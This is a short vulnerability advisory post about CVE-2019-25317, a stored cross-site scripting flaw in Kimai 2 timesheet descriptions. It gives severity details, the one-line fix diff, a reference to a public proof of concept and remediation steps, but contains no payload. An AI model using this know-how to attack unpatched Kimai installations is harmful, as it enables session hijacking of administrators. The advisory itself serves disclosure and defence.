DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2019-25317: Time is Money, and XSS: Dissecting CVE-2019-25317 in Kimai 2

#security #cve #cybersecurity

Time is Money, and XSS: Dissecting CVE-2019-25317 in Kimai 2

Vulnerability ID: CVE-2019-25317
CVSS Score: 6.4
Published: 2026-02-11

In the world of open-source time tracking, Kimai 2 is a popular choice for freelancers and companies alike. However, a nasty skeleton was hiding in the closet (or rather, the timesheets) of versions prior to 1.1. This vulnerability, a classic Stored Cross-Site Scripting (XSS) flaw, allowed any disgruntled employee with basic access to turn their weekly report into a weapon against their employer. By abusing the application's markdown rendering logic, attackers could inject malicious JavaScript that would execute the moment an administrator reviewed the logged hours.

TL;DR

Kimai 2 < 1.1 contains a Stored XSS vulnerability in the timesheet description field. The application failed to sanitize Markdown input, allowing authenticated users to inject arbitrary HTML/JavaScript. When an admin views the timesheet, the payload executes, leading to potential session hijacking.

⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-79
  • CVSS v3.1: 6.4 (Medium)
  • Attack Vector: Network (Stored)
  • Privileges Required: Low (Authenticated User)
  • Impact: Confidentiality & Integrity (Session Hijacking)
  • Exploit Status: PoC Available (EDB-47286)

Affected Systems

  • Kimai 2 versions <= 1.0.1
  • Kimai 2: <= 1.0.1 (Fixed in: 1.1)

Code Analysis

Commit: a0e8aa3

Fix XSS in timesheet description by disabling HTML in markdown and escaping output

- return $this->markdown->toHtml($content, true);
+ return $this->markdown->toHtml($content, false);
Enter fullscreen mode Exit fullscreen mode

Exploit Details

  • Exploit-DB: Persistent Cross-Site Scripting PoC via Timesheet Description

Mitigation Strategies

  • Input Sanitization
  • Output Encoding
  • Content Security Policy (CSP)

Remediation Steps:

  1. Upgrade Kimai 2 to the latest stable version (>= 1.1).
  2. Audit the database for existing malicious payloads in the description column.
  3. Implement a Content Security Policy (CSP) to restrict script execution sources.

References

Read the full report for CVE-2019-25317 on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)